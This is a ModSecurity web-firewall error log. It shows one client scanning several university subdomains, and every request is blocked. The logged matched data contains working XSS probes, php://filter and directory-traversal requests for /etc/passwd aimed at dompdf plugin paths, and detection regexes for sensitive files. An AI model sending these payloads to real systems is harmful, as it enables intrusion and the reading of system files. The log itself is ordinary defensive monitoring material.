[Tue Aug 29 11:53:28.813115 2023] [:error] [pid 2608] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:command. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x95\\x5c\\x8e\\xa6 found within ARGS:command: \\x95\\x5c\\x8e\\xa6"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/Solar_History.php"] [unique_id "ZO15yMCo-f0AAAowNpgAAAAH"]
[Tue Aug 29 11:53:28.820529 2023] [:error] [pid 2579] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:command. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x95\\x5c\\x8e\\xa6 found within ARGS:command: \\x95\\x5c\\x8e\\xa6"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/Solar_History.php"] [unique_id "ZO15yMCo-f0AAAoT7YgAAAAD"]
[Tue Aug 29 11:53:28.823320 2023] [:error] [pid 2612] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:module. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:module: 'onm<a>ouseover=alert(document.domain)'\\x22tabindex=1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/module/"] [unique_id "ZO15yMCo-f0AAAo0gOQAAAAZ"]
[Tue Aug 29 11:53:28.824837 2023] [:error] [pid 2582] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:module. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:module: 'onm<a>ouseover=alert(document.domain)'\\x22tabindex=1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/module/"] [unique_id "ZO15yMCo-f0AAAoW7QgAAAAJ"]
[Tue Aug 29 11:53:28.891581 2023] [:error] [pid 2530] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:module. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:module: 'onm<a>ouseover=alert(document.domain)'\\x22tabindex=1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/module/"] [unique_id "ZO15yMCo-f0AAAni-E8AAAAU"]
[Tue Aug 29 11:53:28.907646 2023] [:error] [pid 2590] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:command. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x95\\x5c\\x8e\\xa6 found within ARGS:command: \\x95\\x5c\\x8e\\xa6"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/Solar_History.php"] [unique_id "ZO15yMCo-f0AAAoesOwAAAAV"]
[Tue Aug 29 11:53:28.909160 2023] [:error] [pid 2609] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:module. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:module: 'onm<a>ouseover=alert(document.domain)'\\x22tabindex=1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/module/"] [unique_id "ZO15yMCo-f0AAAox7HUAAAAN"]
[Tue Aug 29 11:53:28.919564 2023] [:error] [pid 2575] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:module. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:module: module\\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/mods/clansphere/lang_modvalidate.php"] [unique_id "ZO15yMCo-f0AAAoPubgAAAAM"]
[Tue Aug 29 11:53:28.922639 2023] [:error] [pid 2603] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/PhpSpreadsheet/Writer/PDF/DomPDF.php"] [unique_id "ZO15yMCo-f0AAAor7swAAAAk"]
[Tue Aug 29 11:53:28.958871 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:module. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:module: 'onm<a>ouseover=alert(document.domain)'\\x22tabindex=1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/module/"] [unique_id "ZO15yMCo-f0AAAfWOXsAAAAL"]
[Tue Aug 29 11:53:29.377268 2023] [:error] [pid 2612] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/wp-ecommerce-shop-styling/includes/dompdf/dompdf.php"] [unique_id "ZO15ycCo-f0AAAo0gOYAAAAZ"]
[Tue Aug 29 11:53:29.381300 2023] [:error] [pid 2608] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/gboutique/library/dompdf/dompdf.php"] [unique_id "ZO15ycCo-f0AAAowNpsAAAAH"]
[Tue Aug 29 11:53:29.382988 2023] [:error] [pid 2609] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/gboutique/library/dompdf/dompdf.php"] [unique_id "ZO15ycCo-f0AAAox7HYAAAAN"]
[Tue Aug 29 11:53:29.385153 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:command. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x95\\x5c\\x8e\\xa6 found within ARGS:command: \\x95\\x5c\\x8e\\xa6"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/Solar_History.php"] [unique_id "ZO15ycCo-f0AAAolKXYAAAAe"]
[Tue Aug 29 11:53:29.594949 2023] [:error] [pid 2608] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/wp-ecommerce-shop-styling/includes/dompdf/dompdf.php"] [unique_id "ZO15ycCo-f0AAAowNpwAAAAH"]
[Tue Aug 29 11:53:29.972184 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/wp-ecommerce-shop-styling/includes/dompdf/dompdf.php"] [unique_id "ZO15ycCo-f0AAAoz72MAAAAS"]
[Tue Aug 29 11:53:30.171793 2023] [:error] [pid 2610] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:command. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x95\\x5c\\x8e\\xa6 found within ARGS:command: \\x95\\x5c\\x8e\\xa6"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/Solar_History.php"] [unique_id "ZO15ysCo-f0AAAoyGzoAAAAI"]
[Tue Aug 29 11:53:30.228349 2023] [:error] [pid 2605] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/lib/dompdf/dompdf.php"] [unique_id "ZO15ysCo-f0AAAot8QUAAAAn"]
[Tue Aug 29 11:53:30.539244 2023] [:error] [pid 2608] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchinput. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe2\\x80\\x9c/>< found within ARGS:searchinput: \\xe2\\x80\\x9c/><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/search-locker-details.php"] [unique_id "ZO15ysCo-f0AAAowNp8AAAAH"]
[Tue Aug 29 11:53:30.552552 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchinput. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe2\\x80\\x9c/>< found within ARGS:searchinput: \\xe2\\x80\\x9c/><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/search-locker-details.php"] [unique_id "ZO15ysCo-f0AAAn406YAAAAW"]
[Tue Aug 29 11:53:30.554551 2023] [:error] [pid 2614] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchinput. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe2\\x80\\x9c/>< found within ARGS:searchinput: \\xe2\\x80\\x9c/><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/search-locker-details.php"] [unique_id "ZO15ysCo-f0AAAo2m3sAAAAA"]
[Tue Aug 29 11:53:30.557970 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:module. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:module: 'onm<a>ouseover=alert(document.domain)'\\x22tabindex=1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/module/"] [unique_id "ZO15ysCo-f0AAAoLfUIAAAAG"]
[Tue Aug 29 11:53:30.600625 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchinput. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe2\\x80\\x9c/>< found within ARGS:searchinput: \\xe2\\x80\\x9c/><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/search-locker-details.php"] [unique_id "ZO15ysCo-f0AAAoz72YAAAAS"]
[Tue Aug 29 11:53:30.603143 2023] [:error] [pid 2612] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/wp-ecommerce-shop-styling/includes/dompdf/dompdf.php"] [unique_id "ZO15ysCo-f0AAAo0gOkAAAAZ"]
[Tue Aug 29 11:53:30.604467 2023] [:error] [pid 2583] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchinput. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe2\\x80\\x9c/>< found within ARGS:searchinput: \\xe2\\x80\\x9c/><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/search-locker-details.php"] [unique_id "ZO15ysCo-f0AAAoXJyEAAAAP"]
[Tue Aug 29 11:53:30.646977 2023] [:error] [pid 2614] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/includes/dompdf/dompdf.php"] [unique_id "ZO15ysCo-f0AAAo2m30AAAAA"]
[Tue Aug 29 11:53:31.019191 2023] [:error] [pid 2579] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchinput. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe2\\x80\\x9c/>< found within ARGS:searchinput: \\xe2\\x80\\x9c/><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/search-locker-details.php"] [unique_id "ZO15ysCo-f0AAAoT7Y8AAAAD"]
[Tue Aug 29 11:53:31.025268 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO15y8Co-f0AAAnHQr4AAAAT"]
[Tue Aug 29 11:53:31.076488 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/web-portal-lite-client-portal-secure-file-sharing-private-messaging/includes/libs/pdf/dompdf.php"] [unique_id "ZO15y8Co-f0AAAoLfUYAAAAG"]
[Tue Aug 29 11:53:31.237155 2023] [:error] [pid 2583] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15y8Co-f0AAAoXJyQAAAAP"]
[Tue Aug 29 11:53:31.239053 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15y8Co-f0AAAoz72kAAAAS"]
[Tue Aug 29 11:53:31.243141 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15y8Co-f0AAAolKXoAAAAe"]
[Tue Aug 29 11:53:31.243434 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15y8Co-f0AAAoLfUcAAAAG"]
[Tue Aug 29 11:53:31.699645 2023] [:error] [pid 2591] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php"] [unique_id "ZO15y8Co-f0AAAofm8oAAAAX"]
